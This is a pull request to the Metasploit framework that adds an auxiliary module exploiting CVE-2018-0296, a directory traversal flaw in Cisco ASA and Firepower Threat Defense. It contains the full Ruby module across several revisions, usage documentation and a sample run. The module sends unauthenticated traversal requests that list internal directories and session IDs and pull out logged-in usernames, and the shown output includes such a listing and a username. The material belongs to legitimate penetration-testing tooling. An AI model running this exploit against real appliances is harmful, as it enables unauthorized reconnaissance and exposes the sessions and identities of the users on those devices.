### PR TITLE
Add Cisco directory traversal auxiliary module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md
@@ -1,0 +1,129 @@
+## Description
+
+  This module exploits a directory traversal vulnerability on Cisco products running the Adaptive Security Appliance (ASA) software < v9.6 and Firepower Threat Defense (FTD) software < v6.2.3.
+  Sending a specially crafted HTTP request results in viewing the contents of directories that would otherwise require authentication to view.
+
+## Vulnerable Application
+
+  Cisco ASA software < v9.6 and Cisco FTD software < v6.2.3 running on  vulnerable appliances that can be found [here](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/cisco_directory_traversal```
+  4. Do: ```set RHOSTS [IP]```
+  5. Do: ```run```
+
+## Scenarios
+
+### Tested on Cisco ASA 5505 Series running ASA software v8.2
+
+  ```
+
+  msf5 > use auxiliary/scanner/http/cisco_directory_traversal
+  msf5 auxiliary(scanner/http/cisco_directory_traversal) > set rhosts 192.168.1.1
+  rhosts => 192.168.1.1
+  msf5 auxiliary(scanner/http/cisco_directory_traversal) > run
+
+  [+] ///
+  [
+  {'name':'customization','size':0,'type':'1','mdate':1532972199}
+  ,{'name':'bookmarks','size':0,'type':'1','mdate':1532972199}
+  ,{'name':'locale','size':0,'type':'1','mdate':1532972197}
+  ,{'name':'+CSCOT+','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'+CSCOCA+','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'+CSCOL+','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'admin','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'+CSCOU+','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'+CSCOE+','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'sessions','size':0,'type':'1','mdate':1532971871}
+
+  [+] ///sessions/
+  [
+  {'name':'32768','size':0,'type':'1','mdate':1533130976}
+
+  [*] Users logged in:
+  [+] cisco
+
+  [+] //+CSCOE+
+  [
+  {'name':'logo.gif','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'http_auth.html','size':3317,'type':'0','mdate':1532972377}
+  ,{'name':'user_dialog.html','size':2145,'type':'0','mdate':1532972377}
+  ,{'name':'localization_inc.lua','size':4495,'type':'0','mdate':1532972377}
+  ,{'name':'portal_inc.lua','size':30888,'type':'0','mdate':1532972377}
+  ,{'name':'include','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'nostcaccess.html','size':497,'type':'0','mdate':1532972377}
+  ,{'name':'ask.html','size':2520,'type':'0','mdate':1532972377}
+  ,{'name':'no_svc.html','size':1779,'type':'0','mdate':1532972377}
+  ,{'name':'svc.html','size':2701,'type':'0','mdate':1532972377}
+  ,{'name':'session.js','size':371,'type':'0','mdate':1532972377}
+  ,{'name':'useralert.html','size':2526,'type':'0','mdate':1532972377}
+  ,{'name':'ping.html','size':4296,'type':'0','mdate':1532972377}
+  ,{'name':'help','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'app_index.html','size':14531,'type':'0','mdate':1532972377}
+  ,{'name':'tlbr','size':1960,'type':'0','mdate':1532972377}
+  ,{'name':'portal_forms.js','size':265,'type':'0','mdate':1532972377}
+  ,{'name':'logon_forms.js','size':263,'type':'0','mdate':1532972377}
+  ,{'name':'win.js','size':247,'type':'0','mdate':1532972377}
+  ,{'name':'portal.css','size':4757,'type':'0','mdate':1532972377}
+  ,{'name':'portal.js','size':369,'type':'0','mdate':1532972377}
+  ,{'name':'sess_update.html','size':267,'type':'0','mdate':1532972377}
+  ,{'name':'blank.html','size':255,'type':'0','mdate':1532972377}
+  ,{'name':'noportal.html','size':261,'type':'0','mdate':1532972377}
+  ,{'name':'portal_ce.html','size':7990,'type':'0','mdate':1532972377}
+  ,{'name':'portal.html','size':10999,'type':'0','mdate':1532972377}
+  ,{'name':'home','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'logon_custom.css','size':499,'type':'0','mdate':1532972377}
+  ,{'name':'portal_custom.css','size':315,'type':'0','mdate':1532972377}
+  ,{'name':'preview.html','size':259,'type':'0','mdate':1532972377}
+  ,{'name':'session_expired','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'custom','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'portal_elements.html','size':33659,'type':'0','mdate':1532972377}
+  ,{'name':'commonspawn.js','size':379,'type':'0','mdate':1532972377}
+  ,{'name':'common.js','size':369,'type':'0','mdate':1532972377}
+  ,{'name':'appstart.js','size':1777,'type':'0','mdate':1532972377}
+  ,{'name':'appstatus','size':1904,'type':'0','mdate':1532972377}
+  ,{'name':'relaymonjar.html','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'relaymonocx.html','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'relayjar.html','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'relayocx.html','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'portal_img','size':0,'type':'1','mdate':1532971872}
+  ,{'name':'color_picker.js','size':381,'type':'0','mdate':1532972377}
+  ,{'name':'color_picker.html','size':269,'type':'0','mdate':1532972377}
+  ,{'name':'cedhelp.html','size':2819,'type':'0','mdate':1532972377}
+  ,{'name':'cedmain.html','size':5084,'type':'0','mdate':1532972377}
+  ,{'name':'cedlogon.html','size':4147,'type':'0','mdate':1532972377}
+  ,{'name':'cedportal.html','size':2762,'type':'0','mdate':1532972377}
+  ,{'name':'cedsave.html','size':2167,'type':'0','mdate':1532972377}
+  ,{'name':'cedf.html','size':51675,'type':'0','mdate':1532972377}
+  ,{'name':'ced.html','size':51673,'type':'0','mdate':1532972377}
+  ,{'name':'lced.html','size':2477,'type':'0','mdate':1532972377}
+  ,{'name':'files','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'041235123432C2','size':1101,'type':'0','mdate':1532972377}
+  ,{'name':'041235123432U2','size':464,'type':'0','mdate':1532972377}
+  ,{'name':'pluginlib.js','size':375,'type':'0','mdate':1532972377}
+  ,{'name':'shshim','size':1317,'type':'0','mdate':1532972377}
+  ,{'name':'do_url','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'clear_cache','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'connection_failed_form','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'apcf','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'ucte_forbidden_data','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'ucte_forbidden_url','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'cookie','size':0,'type':'0','mdate':1532972377}
+  ,{'name':'session_password.html','size':648,'type':'0','mdate':1532972377}
+  ,{'name':'tunnel_linux.jnlp','size':1663,'type':'0','mdate':1532972377}
+  ,{'name':'tunnel_mac.jnlp','size':1659,'type':'0','mdate':1532972377}
+  ,{'name':'sdesktop','size':0,'type':'1','mdate':1532971871}
+  ,{'name':'gp-gip.html','size':3097,'type':'0','mdate':1532972377}
+  ,{'name':'auth.html','size':467,'type':'0','mdate':1532972377}
+  ,{'name':'wrong_url.html','size':354,'type':'0','mdate':1532972377}
+  ,{'name':'logon_redirect.html','size':1395,'type':'0','mdate':1532972377}
+  ,{'name':'logout.html','size':31552,'type':'0','mdate':1532972377}
+  ,{'name':'logon.html','size':31517,'type':'0','mdate':1532972377}
+  ,{'name':'test_chargen','size':0,'type':'0','mdate':1532972377}
+
+  [*] Auxiliary module execution completed
+
+  ```

--- a/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
@@ -45,63 +45,64 @@ class MetasploitModule < Msf::Auxiliary
     return (res && res.body.include?("SSL VPN Service"))
   end
 
-  def get_files
-    file_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/')
-    sessions_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/')
-    cscoe_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b')
+  def list_files(path)
+    uri = normalize_uri(target_uri.path, path)
 
-    file_res = send_request_cgi(
+    list_res = send_request_cgi(
       'method'  =>  'GET',
-      'uri'     =>  file_uri
+      'uri'     =>  uri
     )
 
-    sessions_res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  sessions_uri
-    )
-
-    cscoe_res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  cscoe_uri
-    )
-
-    if file_res
-      print_good(file_res.body)
-    end
-
-    if sessions_res
-      print_good(sessions_res.body)
-      session_no = sessions_res.body.match('([0-9]{2,})')
-
-      fail_with(Failure::BadConfig, 'Could not grab a session') if session_no.nil?
-      this_res = send_request_cgi('method' =>  'GET',  'uri' =>  normalize_uri(target_uri.path, sessions_uri, session_no))
-
-      if this_res && this_res.body.include?('name')
-        print_good(this_res.body)
-        user_ids = this_res.body.scan(/user:(\w+)/)
-        print_good(user_ids)
-
-        user_ids.each do |id|
-          id_res = send_request_cgi('method'  =>  'GET', 'uri'  => normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/', 'app_index.html'))
-          if id_res
-            print_good(id_res.body)
-          end
-        end
+    if list_res && list_res.code == 200
+      if list_res.body.match(/\/{3}sessions/)
+        list_users(list_res.body)
+      else
+        print_good(list_res.body)
       end
     end
+  end
 
-    if cscoe_res
-      print_good(cscoe_res.body)
+  def list_users(response)
+    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
+    session_no = response.match(/([0-9]{2,})/)
+
+    unless !session_no.nil?
+      print_status("Could not detect any sessions")
+      print("\n")
+      return
+    end
+
+    users_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, sessions_uri, session_no)
+    )
+
+    if users_res && users_res.body.include?('name')
+      user_ids = users_res.body.scan(/user:(\w+)/).flatten
+
+      unless user_ids.empty?
+        print_good(response)
+        print_status('Users logged in:')
+        user_ids.each { |id| print_good(id) }
+        print("\n")
+        return
+      end
+
+      print_status("There are no users logged in currently")
     end
   end
 
   def run
+    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
+    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
+    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'
+
+    paths = [file_uri, sessions_uri, cscoe_uri]
+
     unless is_accessible?
       fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
     end
 
-    get_files
+    paths.each { |path| list_files(path) }
   end
-
 end
-

--- a/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
@@ -1,0 +1,33 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco ASA Directory Traversal',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
+      },
+      'Author'         => [ 'Michał Bentkowski',  # Discovery
+                            'Yassine Aboukir',    # PoC
+                            'Shelby Pace'         # Metasploit Module
+                          ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+                           [ 'CVE', '2018-0296' ],
+                           [ 'EDB', '44956' ]
+                          ],
+      'DisclosureDate' => 'Jun 6 2018'
+    ))
+  end
+
+  def run
+  end
+
+end
+

--- a/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'           => 'Cisco ASA Directory Traversal',
       'Description'    => %q{
         This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
+        It enumerates the contents of Cisco's VPN service which includes directories, files, and currently logged in users
       },
       'Author'         => [ 'Michał Bentkowski',  # Discovery
                             'Yassine Aboukir',    # PoC
@@ -64,9 +65,32 @@ class MetasploitModule < Msf::Auxiliary
       'uri'     =>  cscoe_uri
     )
 
-    if file_res && sessions_res && cscoe_res
+    if file_res
       print_good(file_res.body)
+    end
+
+    if sessions_res
       print_good(sessions_res.body)
+      session_no = sessions_res.body.match('([0-9]{2,})')
+
+      fail_with(Failure::BadConfig, 'Could not grab a session') if session_no.nil?
+      this_res = send_request_cgi('method' =>  'GET',  'uri' =>  normalize_uri(target_uri.path, sessions_uri, session_no))
+
+      if this_res && this_res.body.include?('name')
+        print_good(this_res.body)
+        user_ids = this_res.body.scan(/user:(\w+)/)
+        print_good(user_ids)
+
+        user_ids.each do |id|
+          id_res = send_request_cgi('method'  =>  'GET', 'uri'  => normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/', 'app_index.html'))
+          if id_res
+            print_good(id_res.body)
+          end
+        end
+      end
+    end
+
+    if cscoe_res
       print_good(cscoe_res.body)
     end
   end

--- a/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
       [
         OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
         OptBool.new('SSL', [ true, 'Use SSL', true ]),
-        Opt::RPORT(8080)
+        Opt::RPORT(443)
       ])
   end
 

--- a/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
+++ b/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
@@ -24,9 +24,59 @@ class MetasploitModule < Msf::Auxiliary
                           ],
       'DisclosureDate' => 'Jun 6 2018'
     ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
+        OptBool.new('SSL', [ true, 'Use SSL', true ]),
+        Opt::RPORT(8080)
+      ])
+  end
+
+  def is_accessible?
+    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  uri
+    )
+
+    return (res && res.body.include?("SSL VPN Service"))
+  end
+
+  def get_files
+    file_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/')
+    sessions_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/')
+    cscoe_uri = normalize_uri(target_uri.path, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b')
+
+    file_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  file_uri
+    )
+
+    sessions_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  sessions_uri
+    )
+
+    cscoe_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  cscoe_uri
+    )
+
+    if file_res && sessions_res && cscoe_res
+      print_good(file_res.body)
+      print_good(sessions_res.body)
+      print_good(cscoe_res.body)
+    end
   end
 
   def run
+    unless is_accessible?
+      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
+    end
+
+    get_files
   end
 
 end


### PR DESCRIPTION
This module exploits a directory traversal vulnerability on Cisco products running the Adaptive Security Appliance (ASA) software < v9.6 and Firepower Threat Defense (FTD) software < v6.2.3.
Sending a specially crafted HTTP request results in viewing the contents of directories that would otherwise require authentication to view.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/http/cisco_directory_traversal`
- [x] `set RHOSTS [IP]`
- [x] `run`
- [x] You should see the files of each of the paths searched
